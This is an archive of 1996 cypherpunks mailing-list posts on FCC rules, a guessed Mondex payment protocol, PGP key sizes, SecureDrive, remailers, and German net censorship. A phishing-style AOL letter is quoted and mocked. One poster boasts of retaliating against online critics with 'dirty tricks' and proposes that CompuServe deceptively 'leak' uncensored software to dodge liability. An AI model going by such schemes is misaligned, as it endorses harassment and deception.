( http://www.zdnet.com/~intweek/print/951218/upfront/doc11.html)

>From the article:

>FCC Chairman Reed Hundt provided the tip-off earlier this year during a
>speech he gave in Washington at the Networked Economy Conference. Hundt said
>the commission would issue a Notice of Proposed Rule-Making sometime this
>year in order to re-examine how access charges are assigned and universal
>service is funded, said Mark Corbitt, Hundt's main technology adviser.
>
>The Internet community "should wake up [and] pay attention," Corbitt
>said. "This issue could hit them before they know it. I don't think
>most of them are even aware" that this is bubbling up through the agency.

____End forwarded message____

I would hope that we would flood them with comments during the period
after the "Notice of Proposed Rule-Making" appears, not that it will
help, as they have already made up their minds. The FCC (like the FDA)
should be defunded, not just "cut," whatever that word means anymore.
There are good economic reasons why this won't help "universal access"
any more than peanut subsidies help minority farmers, despite lies to
the contrary by various self-interested bureaucrats. As Republicans
said (before they became the majority party) "Cut Their Pay and Send
Them Home."
JMR

Regards, Jim Ray
 http://www.shopmiami.com/prs/jimray
             "Hooters GUYS? Washington -- GET A GRIP!"
_______________________________________________________________________
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Public Key id. #  E9BD6D35  <liberty@gate.net>  IANAL
_______________________________________________________________________
Help Phil! e-mail zldf@clark.net or http://www.netresponse.com/zldf
_______________________________________________________________________


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh.

iQCVAwUBMOtDhm1lp8bpvW01AQHwXQP/XLPjBtLj55FUCTIY+F5Jz6+q9Y3a6Ies
qLKoMcGbSMZfNxqzS7nenBCwGgyajl2kxea7zjPJkVZiKgAMPTyOYQ7inrIMyLp3
G7OgmroqnqT7NqXJuAzpOVO86QrbT29kJhsTs9HgiD3dBjHLEGZX5uCAhiAxVS/A
ZraKvoyZ1ao=
=3NjK
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Thu, 4 Jan 1996 14:33:36 +0800
To: cypherpunks@toad.com
Subject: A Mondex like Protocol
Message-ID: <ad10d63504021004e0fc@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


Two Mondex units, upon command of their respective operators, can pass
money from one to the other via infra_red signals. I think that this
requires tamper proof units.

I understand that the Mondex protocol is currently undisclosed. I have no
information about that protocol but am merely trying to find a protocol
that fits the little that I know about Mondex. Are there other guesses?

Here is one way it might work. Upon an operator receive command, the payee
unit transmits a DH greeting along with the value of a counter located in
the payee unit. (The integrity of the counter value in the greeting is
somehow ensured.) It continues to send this greeting while it awaits a
greeting.

Upon a pay command from its operator, a payer unit transmits a DH greeting
and continues to send that while it awaits a greeting. When either unit
receives a greeting it computes the shared secret key ala DH. The payer
decrements its cash value and generates a pay order enciphered under the
secret key. The pay order includes the counter value from the payee's
greeting. This order is transmitted repeatedly until an acknowledgement is
received or times out. If it times out then the money is lost. When the
payee receives a pay order, it verifies that the counter value is correct
and then increments the counter, preventing replay. The payee then
increments its cash value and sends ciphered acknowledgements for a brief
period. The payer may give one final acknowledgement acknowledgement which,
if lost, merely means that the receiver will time-out sending
acknowledgements.

The common DH modulus is known to all units and but otherwise secret. This,
of course, requires a extraordinary tamper resistance. Only the state must
be kept secret, not the hardware behavior.

Here is the money integrity argument for this protocol. The units are
collectively responsible for preventing counterfeiting. For counterfeiting
to happen some unit must increment its cash value when there was no
corresponding decrement in another unit. A unit increments its cash value
when it decodes a pay order from someone who knows the global secret DH
modulus. That someone must have been a legitimate unit that decreased its
cash value. Replay is impossible because each such transaction is uniquely
identified by the recipient's counter value. The recipient never increments
its cash value twice for the same counter value.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Thu, 4 Jan 1996 11:48:06 +0800
To: cypherpunks@toad.com
Subject: Will the real Anonynous please stand up
Message-ID: <199601040332.WAA24066@pipe6.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


 
Herewith is where my confusion developed by Anonymous #1, posted as Date:
Sun, 31 Dec 1995 18:34:56 -0600, Message-Id:
<199601010034.SAA07422@tjava.com>: 
 
The story as presented by Anon #1, while supposedly from Reuters quotes the
Associated Press, something that rarely if even happens. 
 
Another story, posted by Anonymous #2 (presumably the same entity as
Anonymous #1), posted as Date: Mon, 1 Jan 1996 01:25:12 +0100, Message-Id:
<199601010025.BAA04537@utopia.hacktic.nl> 
is slugged "BEIJING (AP)_ " and quotes Xinhua News Agency; 
 
A reference by Anonymous #3 (presumably the same entity as Anon #1 & #2),
posted as Date: Wed, 3 Jan 1996 14:47:35 -0800, Message-Id:
<199601032247.OAA00603@jobe.shell.portal.com> states that  the faked story
changed the words "Xinhua news agency" to "the Associated Press." 
 
Looking down the list of posts to the cp list for past posts by "Anonymous"
the first one I came to was titled "first germany, now china" and not "US
calls for measures... " as Anonymous #3 wrote in the referencing post. 
 
There were at least two wire service stories: 
 
Reuters: China calls for measures against Internet porn 
Date: Sun, 31 Dec 1995 9:20:13 PST 
Message-ID: <Rchina-internetURelN_5DV@clari.net> 
clari.news.censorship 
 
Associated Press: China to Block Internet Porn 
Date: Sun, 31 Dec 1995 15:10:29 PST 
Message-ID: <Ainternet-pornURTH5_5DV@clari.net> 
clari.news.censorship 
 
Add to this is the confusion that several entities are posting to the cp
list using the same name -- "Anonymous" -- without differentiating their
posts from any of the other posts by (inferentially) other entities with
the same name. 
 
I have no problem with people (dolphins, whales, or space creatures, etc.)
posting anonymously. I do have *significant* problems with their lack of
seriousness that we see in their willingness to be confused by others of
the same name. I have even more significant problems with their seeming
willingness to expect me to straighten out this confusion that they are
either too lazy or too chaotically-oriented to do themselves. 
 
Even English monarchs, in centuries past when monarchs like Anonymous only
had one name, were given some additional signifier to keep them separate
(e.g. "Donald the Fat" vs. "Donald the Terribly Ugly" vs. "Donald the
Wonderful With A Really Good Ad Agency"). 
 
Scientific discussions to which people wish to contribute anonymously are
OK with me; the same discussions that are starting to resemble the
confusion of a Month Python skit are not. 
-- 
     -- tallpaul 
     -- Any political analysis that fits on a bumper sticker is wrong. 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Thu, 4 Jan 1996 20:30:02 +0800
To: cypherpunks@toad.com
Subject: Re: bumper stickers
Message-ID: <199601040411.XAA29821@pipe6.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jan 03, 1996 22:25:26, 'liberty@gate.net (Jim Ray)' wrote: 
 
 
><snip> 
> 
>>     -- Any political analysis that fits on a bumper sticker is wrong.  
> 
> 
>My bumper sticker says, "Politicians and diapers need to be changed -- 
>often for the same reason." Politicians keep on proving this analysis 
>RIGHT, much as I *wish* it were wrong. 
>JMR 
>Regards, Jim Ray 
>http://www.shopmiami.com/prs/jimray 
>"Hooters GUYS? Washington -- GET A GRIP!" 
> 
 
I am not sure if I understand the political argument that J. Ray believes
is so "RIGHT" that he wishes to post it to the cypherpunks list. I infer
that the answer he is implying is that they are both "full of shit." I have
no problem with humorous bumper stickers. I frequently use parodies of
bubble-brained "progressivism" as my .sig files (e.g. "Visualize whirled
peas" or "Give pizza chants" but I do not confuse them with detailed
social, political, mathematical, philosophical, or especially economic
analysis. 
 
J.Ray may wish to comment on the anality of politicians; that is an opinion
over which I have no desire to comment. But to seriously maintain that one
needs to replace an elected official based on the presumed state of his
bowels, to post this info publically, and to insist that the analysis is
"RIGHT" is rather an example of what I meant. 
 
One might define cypherpunks in three areas: 
 
a) they write code, *code* and CODE; 
b) they are concerned about anonymity; 
c) they are concerned about privacy. 
 
The code they write is based on algorythms. They are short, terse, and
elegant. The code that the algorythmicly-oriented cypherpunks have written
is wonderful and a major contribution to human freedom. They write far
better code than I have ever written or will ever be likely to write. 
 
And you can put elegant mathematical equations on bumper stickers. They can
fit and they are true. The best example might be "E = MC^2". 
 
Unfortunately, the other two issues are not subject to the same type of
solutions as is encryption code. The time one spends working on the elegant
algorythms is time not spent on broader issues of political science,
sociology, economics, history, etc. Unfortunately, many do not realize this
and so treat complex social issues as if they can be decided with the same
type of elegant algorthym as the code. They can not. The English language
does not have the compact elegance of C++. Nor is the range of human
problems and interrelationships anywhere near as narrow as that of the
average instruction set of a CPU. So attempts at solving complex social
problems in the same way are *always* wrong, as witness J.Ray's original
post to the group. 
 
I do not mean to suggest that every algo-oriented individual must, of
necessity, miss the larger social issues. Einstein, for example, came up
with a mean critique of E. Mach, but only because Uncle AL put a lot of
post-1905 time studying complex aspects of philosophy. His critique, by the
by, did not fit on a bumber sticker. 
 
     -- tallpaul 
     -- Gun control means being able to hit your target! 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael C. Peponis" <mianigand@unique.outlook.net>
Date: Thu, 4 Jan 1996 04:11:53 +0800
To: cypherpunks@toad.com
Subject: Re: What to do about Germany
Message-ID: <199601031913.NAA11851@unique.outlook.net>
MIME-Version: 1.0
Content-Type: text/plain


On  Wed, 3 Jan 1996 11:52:34 +0100 (MET) Cees de Groot wrote

>> What the German goverement threatned to do was inexcusable, but 
>> something can be done about it.

>Sorry, but the "German government" did not threaten to do anything at 
>all. A (conservative-ish) prosecutor started an _investigation_, which
>in his eyes was nothing more than executing the law (and sorry, 
>that's what the guy is paid for).

So what does the above paragraph mean, it was not the goverment that 
threated, it was a procecutor who was acting on behalf of the 
govement to enforcese the laws of that body which is what he is paid 
to do.  

Gee, that's what I said, only alot more complicated and detailed.  In 
the end, the party at fault is the some division of the German 
goverment, the procecutor is not an individual person acting on 
his/her own behalf.

>If the German government did something wrong, it was accepting a law
>for the protection of minors (Jugendschutzgesetz), which says that
>minors should not be allowed to have access to booze, dope and 
porno.

But that's a GERMAN law, the Internet is an INTERNATIONAL community.  
If we have to respect the laws of Germany, and their customs and 
archaic belief systems, them we have to give the same consideration 
to anyother countries backwords, morality-based, mentality.  There 
are hundreds of countries on the planet, most of them backwards.  
Respect everybodys sence of decency and right and wrong and nobody 
will be able to transmit anything the least be vulgar becasue it 
would violate some countries law some where on the planet.

>Please tell me such laws do not exist in your country...
They do exist, but I have been breaking them since 13, I don't care 
to be protected by some "moral" and "ethical" person, I can decide 
for myself what I can and can not do.

>If anything, this whole bussiness will be one step in the correct
>direction:
>- Either some modus operandum is found which makes it clear for 
>everybody
 > how to offer pornographic material and comply with the law at the
>  same time (cf. the First Virtual account ID's you have to enter at
>  all those sites pointing to www.infohaus.com - in the US, this 
>modus
>  operandum seems to be ``proof of having a credit card'');

That's just brilliant exhange one evil for another.  Instead of 
censorship, we take away people's rights to autonymity and privacy.
Sorry, not an option.

> Or the German Government learns about the lack of frontiers on the 
>Net, and gives up (which is highly improbable).

Or they can be given consequences for their actions.  Let it be known 
that people will not tolerate them enforcing their laws on everybody. 
 The weaker any goverment, the more ineffective it is in imposing 
it's will, the better off individuals are.


>considering that German prosecutors don't have the option of not
>prosecuting when they hear about a felony, like for example Dutch
>prosecutors.
No the prosecutor does not have a choice, that's why you attact the 
people that make the laws, or the governing body as a whole.  They 
try to impose there will on me, I will unlease my dirty tricks on 
them.  Fair is fair.

I have the ablity to impose my will on ohters, I have done so when 
certin persons have gotten on my nerves by posting things to 
newsgroups that were blatently off topic and they had been told and 
warned about it on serveral occasions.  But when you go to a sexualy 
explicit newsgroup, what do you think you will find, what is the 
purpose of such a group?  Protection of children is a parents 
responsiblity, if they can't handle that responsiblity, that is thier 
problem, not mine.


 Given my experiencewith the German government,
>however, it will take some time for them >to realize that they need
>a set of rules in this area.
Again, that is Germany's problem, not mine, make it an issue and 
suffer the consequences.

-- 
>OpenLink Software
Tell Kinsley I said hello
Regards,
Michael Peponis
PGP Key Avalible form MIT Key Server




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 4 Jan 1996 14:08:09 +0800
To: Corey Bridges <cypherpunks@toad.com
Subject: Re: AOL security letter
Message-ID: <ad10abc100021004d582@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



>bj:     ALERT: Password Security
>Date:   95-12-31 07:27:13 EST
>From:   Steve Case
>Sent on:        America Online (using Stratus)

>"Dear AOL Community Member:

>...Some of the effects as a result of not having the database link files
>include: random log-off's, AOLnet runs slower, and Email may accidentally be
>deleted. These problems are MAJOR inconveniences to our users, so we need
>your help to fix the problem."

Are you guys really sure you need me to send in my AOL password? I don't
use my AOL account very often, but if you really need it, here it is:

Username: Tim May, tcmay@aol.com

Passphrase: 42trollsrus

I hope this helps.

--Tim May, tcmay@aol.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@tjava.com (Anonymous)
Date: Thu, 4 Jan 1996 13:50:41 +0800
To: cypherpunks@toad.com
Subject: Re:US calls for measures against Internet porn [NOISE]
In-Reply-To: <199601040042.TAA29802@pipe6.nyc.pipeline.com>
Message-ID: <199601040526.XAA03570@tjava.com>
MIME-Version: 1.0
Content-Type: text/plain


tallpaul writes:
> I was going to post on this topic, especially on a paraphrase of the
> (ostensible) original. I still want to, but let me play either the
> skeptical or responsible journalist (reader's choice of adjectives). 
> 
> Anonymous has *not* revealled the original source as he/it/she claimed.
> They have asserted it came from Xinhua news agency. Will Anonymous post a
> pointer to where we can access on the internet the original? News feed,
> date, and time of posting, as well as message ID should suffice. 

I hope these headers are sufficient. I used the Clarinet news feed on
Netcom to get the original copy of the text. No doubt the story is on
archive sites elsewhere. I did _not_ post the original to cpunks.

From: C-reuters@clari.net (Reuters)
Subject: China calls for measures against Internet porn
Message-ID: <Rchina-internetURelN_5DV@clari.net>
Date: Sun, 31 Dec 1995 9:20:13 PST
Newsgroups: clari.tw.new_media,clari.news.issues.censorship,
 clari.world.asia.china,clari.tw.issues,clari.news.sex,clari.news.issues.misc,
 clari.news.censorship,clare.tw.misc

Thus, this is the first of the two stories you cited in "Will the real
Anonymous please stand up".
<199601040332.WAA24066@pipe6.nyc.pipeline.com>

tallpaul also writes:
> Herewith is where my confusion developed by Anonymous #1, posted as Date:
> Sun, 31 Dec 1995 18:34:56 -0600, Message-Id:
> <199601010034.SAA07422@tjava.com>: 

I am the author of that message.

> The story as presented by Anon #1, while supposedly from Reuters quotes the
> Associated Press, something that rarely if even happens. 

The original of the story does quote Xinhua. I personally thought it
was a nice satirical touch to equate Xinhua and the Associated Press.
Apparently, my irony was lost.

> Another story, posted by Anonymous #2 (presumably the same entity as
> Anonymous #1), posted as Date: Mon, 1 Jan 1996 01:25:12 +0100, Message-Id:
> <199601010025.BAA04537@utopia.hacktic.nl> 
> is slugged "BEIJING (AP)_ " and quotes Xinhua News Agency; 

Not the same anonymous. That was the AP story, and I believe is
legitimate.

> A reference by Anonymous #3 (presumably the same entity as Anon #1 & #2),
> posted as Date: Wed, 3 Jan 1996 14:47:35 -0800, Message-Id:
> <199601032247.OAA00603@jobe.shell.portal.com> states that the faked story
> changed the words "Xinhua news agency" to "the Associated Press." 

That's me, thus the same as #1, but different from #2.

> Add to this is the confusion that several entities are posting to the cp
> list using the same name -- "Anonymous" -- without differentiating their
> posts from any of the other posts by (inferentially) other entities with
> the same name. 

I agree this is confusing. I considered signing my posts "Mallet
D'nonymous," but decided that would be too much of a taunt.

> Scientific discussions to which people wish to contribute anonymously are
> OK with me; the same discussions that are starting to resemble the
> confusion of a Month Python skit are not. 

I _do_ apologize for the confusion. I thought it was going to be a
nice clean satire, but the two wire stories made things more
complicated, and I perhaps did not step in to clear the confusion when
I should have.

The only reason I'm being anonymous is to protest the copyright laws.
Theoretically, my post may have been a violation of Reuters'
copyright. I believe this is the same reason why Anon #2 chose to be
anonymous, but of course I have no way of knowing for sure.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 4 Jan 1996 16:26:36 +0800
To: cypherpunks@toad.com
Subject: Re: DOS/Windows remailer chaining
Message-ID: <199601040811.AAA27446@ix12.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:27 PM 1/2/96 +0100, nobody@REPLAY.COM (Anonymous) wrote:
>Cypherpunks write code. With that phrase and the wave of attempts to 
>censor the 'Net, I've embarked on a quest to make remailers easier to use.
>
>Has anyone written an easy to use Windows or DOS application that will let
>someone chain a message through several remailers, perhaps with support
>for the mailer at alpha.c2.org? 

Yup.  Private Idaho, www.eskimo.com/~joelm/ does just that,
along with calling PGP to do things you commonly want done.


>Would the writer of such a program, if in the US fall under the provisions
>in ITAR? Obviously, calls to the PGP program would have to be made. I
>recall reading that such hooks do fall under the ITAR. If this is true, so
>much for a more user friendly version of chain for the masses. 

Depends on whether it's a "component" of an encryption system or not.
But if you're not doing PGP, no problem at all (except of course that
_real_ remailers only talk encrypted....)
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
#
# "The price of liberty is eternal vigilance" used to mean us watching
# the government, not the other way around....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 5 Jan 1996 06:29:13 +0800
To: cypherpunks@toad.com
Subject: Re: 2047 bit keys in PGP
Message-ID: <199601040811.AAA27453@ix12.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>> Are you sure it's a bug in the DOS version? When I did a pgp -kg in my 
>> UNIX shell (US version 2.6.2) I also entered 2048 bits and it too 
>> created a 2047 bit key instead.

There are some versions that can only do 2047; there are others that have
some sort of bug dealing with keys over some number like 2032, so if you're
doing a new key around that size, 2000 might be safer.

Looking at the distribution of keysizes on the MIT key server was interesting;
there are a lot of unique or lightly-used values besides the popular 
384, 510, 512, 768, 1024, 2047, 2048....  Something to think about if you're
concerned about traffic analysis and anonymity.

>> Why is there a limit to the size of the key anyway? It's too bad PGP 
>> doesn't support any size key (within reason).

By the time the Bad Guys can factor 2047-bit keys cheaply, you'll have
more serious problems to worry about, which may fundamentally change
your assumptions about cost-effective cracking and the amount of
security you need to provide.  Remember that 1024 is currently way
beyond crackable, so interesting theoretical things will have to
happen before even that much is at risk.

Also, there are a _lot_ of things around that tend to get 128-bit
MD5 calculations in them - don't get overoptimistic about anything
that pretends to be stronger than that.  (IDEA's 128-bit keys are
about as tough as 3000+bit RSA keys, and anything limited to 128 bits
is going to be in that general ballpark.)  PGP's random number stuff
_is_ stronger than that, but that's still a fundamental limit.

As a separate issue, programs do their calculations in data structures which
have _some_ sizes to them.  They could be assigned dynamically, but
large-and-static isn't that bad, and PGP was originally for DOS anyway;
if that's the least evil thing you find in the code, be happy :-)
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
#
# "The price of liberty is eternal vigilance" used to mean us watching
# the government, not the other way around....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Fri, 5 Jan 1996 06:26:54 +0800
To: gnu@toad.com
Subject: Re: Guerilla Internet Service Providers (wireless)
Message-ID: <9601040826.AA09122@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


If you want to try a wireless network run by a couple of known
cypherpunk types, browse www.fish.com.  Your packets will be moving
over a 2 Mbit/sec wireless network, using AT&T WaveLan
(www.ncr.com/pub/products/wavelan) ISA-bus cards in PC-clone routers
built by KarlNet (www.karlbridge.com).  I think of it as a NAN
(Neighborhood Area Network).  The security is only DES at the
card level, but we hope to layer IPSEC (RFC 1825) on top.

	John




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Black <black@eng.usf.edu>
Date: Fri, 5 Jan 1996 03:59:00 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: 2047 bit keys in PGP
In-Reply-To: <m0tXhdo-00092mC@pacifier.com>
Message-ID: <Pine.SUN.3.91.960104003241.3923A-100000@kinks>
MIME-Version: 1.0
Content-Type: text/plain


Hello,

On Wed, 3 Jan 1996, jim bell wrote:

> It seems to me that the best argument AGAINST supporting (and using) keys
> greater than 2048 bits is the false sense of security created.  Even
> 1024-bit keys will probably be safe for decades if just the algorithm is
> concerned.  Far more threatening are various other attacks, including RF
> snooping in combination with specialized viruses, as well as black-bag jobs
> on hardware.

  I have been reading this discussion, and I would recommend that someone 
show the time that Bruce Schneier has in his book "Applied Cryptography" 
(2nd ED), as he covers the security of different key lengths very well.  
I would also suggest that people read it if this is a topic that 
interests them, as it was written very well. 
  I would quote from it, except that I am at work, and the book is in my 
dorm room. :)
  Enjoy and have fun.

==========================================================================
James Black (Comp Sci/Comp Eng sophomore)
e-mail: black@eng.usf.edu
http://www.eng.usf.edu/~black/index.html
"An idea that is not dangerous is unworthy of being called an idea at all."
Oscar Wilde 
**************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Edgar Swank <edgar@Garg.Campbell.CA.US>
Date: Thu, 4 Jan 1996 22:27:19 +0800
To: Cypherpunks          <cypherpunks@toad.com>
Subject: SecureDrive News
Message-ID: <o2B7gD9w165w@Garg.Campbell.CA.US>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Overseas FTP site Changes

As I thought might happen, the operators of the utopia ftp site have
moved SecureDrive 1.4a from the incoming directory to a permanent
home,

ftp://utopia.hacktic.nl/pub/reply/pub/disk/secdr14a.zip
ftp://utopia.hacktic.nl/pub/replay/pub/crypto/CRYPTOapps/secdr14a.zip

It has also appeared on at least one "mirror" site

Host ftp.univie.ac.at

    Location: /security/crypt/mirrors/utopia.hacktic.nl/crypto/CRYPTOapps
           FILE -r--r--r--     131174  01-Jan-1996 01:54:57  secdr14a.zip
    Location: /security/crypt/mirrors/utopia.hacktic.nl/disk
           FILE -r--r--r--     131174  01-Jan-1996 01:54:57  secdr14a.zip

which turned up in an Archie search.

New Utility for use with SecureDrive and Windows 3.1

I have previously recommended EDOS as a mechanism to allow setting
PGPPASS under a DOS window of Windows 3.1.  A user has brought to my
attention that a freeware utility, SETENV, that can be found at

ftp://ftp.coast.net/SimTel/msdos/envutil/stnvjw25.zip

that has the same function and also has a "password" mode for non-echo
entry.  I just tried it and it seems to work.

SecureDrive and Windows 95

I have gotten many inquiries about SecureDrive and Windows 95.  I
don't have a copy of Win95 myself, but, based on user reports, I can
report that SecureDrive 1.4a does work with Windows 95, but with some
restrictions.

1)Always run CRYPTDSK and LOGIN under bare DOS, outside of Windows 95.
Do not try to run either in a DOS window under Win95.

2)Run SECTSR and LOGIN x: /S in AUTOEXEC.BAT before other TSR's.

3)Run LOGIN x:  (prompts for passphrase) later in AUTOEXEC.BAT, but
before entering Windows. Enter the correct passphrase if you
anticipate needing access to the encrypted partition.

4)After entering Windows, use the Control Panel to set 16-bit disk
access. Use of 32-bit drivers may give direct access to the encrypted
data, which is very dangerous for integrity of the data.

I'm told step 4 may not be necessary if the encrypted partition has
its own physical disk. In this case, Win95 will automatically switch
to 16-bit drivers if the correct passphrase is entered to enable
access to the encrypted partition.

I've also been told of one instance where CRYPTDSK and/or LOGIN failed
to find the correct partition from the DOS drive letter. If this
happens, use the physical partition parameters, as explained in the
documentation.

Please continue to report experiences & problems to me.

Edgar W. Swank   <edgar@Garg.Campbell.CA.US>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMOtGRN4nNf3ah8DHAQGzRAP9G6Ct2+pSH23h1GdoWqjCUAVkxs1oWvLU
4qz76NkVUQ9ZnlbSTY8bPvfAZZICBh9TjnBF+T5ph6fLaBEYj+q6od8RvO+HJY+r
a7B6/3RSQHKNcAjpn4YZ9wIVimQS7RNLyBCiiuEbuC70OwgezD8p98/aWuRlCDxC
ZcTRbkyyEsA=
=KFb/
-----END PGP SIGNATURE-----

-- 
edgar@Garg.Campbell.CA.US (Edgar Swank)
The Land of Garg BBS -- +1 408 378-5108




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: everard@infi.net (M. Scott Everard)
Date: Thu, 4 Jan 1996 13:55:10 +0800
Subject: Re: Fred Cohen, PhD
In-Reply-To: <9512311818.AA16259@all.net>
Message-ID: <4cfl5e$qj9@news.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


In article <9512311818.AA16259@all.net>, fc@all.net (Fred Cohen) says:
>
>> Regarding Fred Cohen, PhD:
>> 
>> Cohen's haughty and bombastic style do nothing good for his reputation.  I
>> assume he advertises his PhD to highlight his early accomplishments; he has
>> done little since.
>

Anyone that has earned a PhD has EARNED the right to follow his/her name
with that distinction.  Power to him.  It's an accomplishment that we should
all strive for if we're so inclined.  Dr Cohen: I respect your degree and it
doesn't bother me one bit for you to  use the title that you deserve.

>Apparently you have a reading disability.  I haven't used Ph.D. next to my
>name on this forum for some time.
>
>> Let's also consider the granting institution, a second-rank school.

Let's consider the cretin that considers USC a "second rank school."

>
>When you insult me, that's one thing, but insulting my school is
>something quite different.  The University of Southern California is one
>of the finest educational institutions in the world, and is widely
>recognized as such.  The engineering school at USC (from which I earned
>my Ph.D.) is commonly ranked in the top 10 in the US, and in the year
>that I graduated, my department was ranked in the top 5 in the US.
>
>USC, in addition to having a fine athletic tradition, also has many
>unique benefits that sets it apart from many other excellent schools. 
>But I wouldn't want to advertise in this forum - you'll have to contact
>them directly for more extensive information.
>
>> Cohen's thesis broke new ground, but how many people have read it, or any of
>> his writings, or know anything about his ideas beyond a single word?  How far
>> did he carry this work?  Where are the conference and journal papers?  Cohen's
>> reputation faded into obscurity long ago.  Now he is building a new reputation
>> as a pig-headed loudmouth, threatening his "defamers."  Shades of Sternlight.



And what, may I ask, have YOU written?


>Some people are ignorant because they haven't had a chance to learn, but
>other people are ignorant because they choose to be.  In your case, it is
>apparently the latter.  But I will answer your questions nonetheless:
>
>How many people have read it, or any of his writings, or know anything
>about his ideas beyond a single word?
>
>        The thesis has only sold a few hundred copies, however, over
>        20,000 people have read my books on the subject.  My two
>        articles in "The Sciences" reached about 25,000 people each.
>        But I don't think thatr the value of peoples' work is a
>        function of how many people know about them.
>
>How far did he carry this work?
>
>        I have published over 30 refereed journal articles on the subject,
>        about 50 conference papers, about 100 invited talks, and today,
>        over 1/2 of all computers in the world run virus defense software
>        using techniques I first published.  That's more refereed papers
>        than anyone else in the world on that particular subject.
>
>Where are the conference and journal papers?
>
>        They are listed on the Web site listed below.  They include
>        IEEE, ACM, and IFIP papers, invited papers at IEEE, ACM,
>        DPMA, IFIP, and NIST conferences (as well as many others).
>
>So, now that we have a very brief history of my work, let us all know
>where you went to school, how many journal and conference papers you
>have published, how many books you have written.
>
>We already know that you won't tell people your name because you are
>afraid to have it associated with you personally, but maybe you can help
>us all understand how expert you are and what you have contributed to
>the world so we can appreciate your point of view.
>
>-> See: Info-Sec Heaven at URL http://all.net/
>Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



I really don't understand this guys' hostility toward Dr Cohen.  But...
it just doesn't matter.  To hell with him.























From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael C. Peponis" <mianigand@unique.outlook.net>
Date: Thu, 4 Jan 1996 08:17:23 +0800
To: cypherpunks@toad.com
Subject: Re: Massey, CEO of Compuserve, on Internet
Message-ID: <199601032345.RAA06435@unique.outlook.net>
MIME-Version: 1.0
Content-Type: text/plain


> On Wed, 3 Jan 1996, Robert A. Rosenberg wrote:
> 
> > CIS always knows where you are dialing in from. Here is the start of a
> > typical connection (using the Mac Program NAVIGATOR).
> > 
> > >0001NUH
> > >
> > >Host Name:  CIS
> > >
> > >User ID: xxxxx,xxx/INT
> > >Password:
> > >[Navigator: Logged on]
> > >
> > >Welcome to CompuServe Information ServiceT01NUH @38400!
> > >
> > >Last access: Mon, Dec 18, 1995 23:11
> > >Connected to port CIS T01NUH @38400
> > 
> > That NUH identifies that I am calling in via a V34 Node in NYC and the T01
> > says I got the first modem on the Rotory. If CIS wanted to restrict access
> > via the NYS nodes, that NUH would be an adequate flag to trigger this
> > action.
> 
> Wouldn't this require some software routines added to check for this?  I
> expect the decision to build or buy is what CIS is now weighing. Also, I
> would imagine that a German could always call a POP outside the country if
> they wanted to pay for it..... (note that I am still not in favor of the
> action, but these are probably CIS's considerations.)

Well, this could be away for compuserve to cover it's rear in a realy 
slick fashion. If they chose to do it this way.

Most CIS subscribers use their proprietary interface, which puts a 
GUI front end over what is going on with them modem, what they amount 
to are scripts. 

Anyways, CIS could add a script that would check the NUH identifier, 
if it is in Germany, it goes to one newsfeed, if it's outside of 
Germany, it would go to another newsfeed.  They could even market the 
service here in the US to those who like censorship.

What could be "Accidentaly" leaked is a different version of the same 
file, that would not contain the check.

That way, Compuserve could claime that the offending parties tampered 
with the software, and they can not be help responsible for the 
tampering.

I highly doubt that Compuserve would go for such a resolution, but 
it's worth throwing into the mix
 
Regards,
Michael Peponis
PGP Key Avalible form MIT Key Server
Key fingerprint =  DD 39 66 3D AE DE 71 C2  B6 DA B2 3F 47 2A EB AC 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael C. Peponis" <mianigand@unique.outlook.net>
Date: Thu, 4 Jan 1996 16:23:48 +0800
To: Laszlo Vecsey <cypherpunks@toad.com>
Subject: Re: 2047 bit keys in PGP
Message-ID: <199601040009.SAA07299@unique.outlook.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> Why is there a limit to the size of the key anyway? It's too bad PGP 
> doesn't support any size key (within reason).

Within reason is the Key Phrase.  Even with a Pentium 90, I notice a 
considerable lag in decrypting messages that have been encrypted with 
a key larger than 2047/8.

Even if you have a fast machine, if the person recieving the message 
could wait a long time to decrypt you 4096 byte encrypted message.
 

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

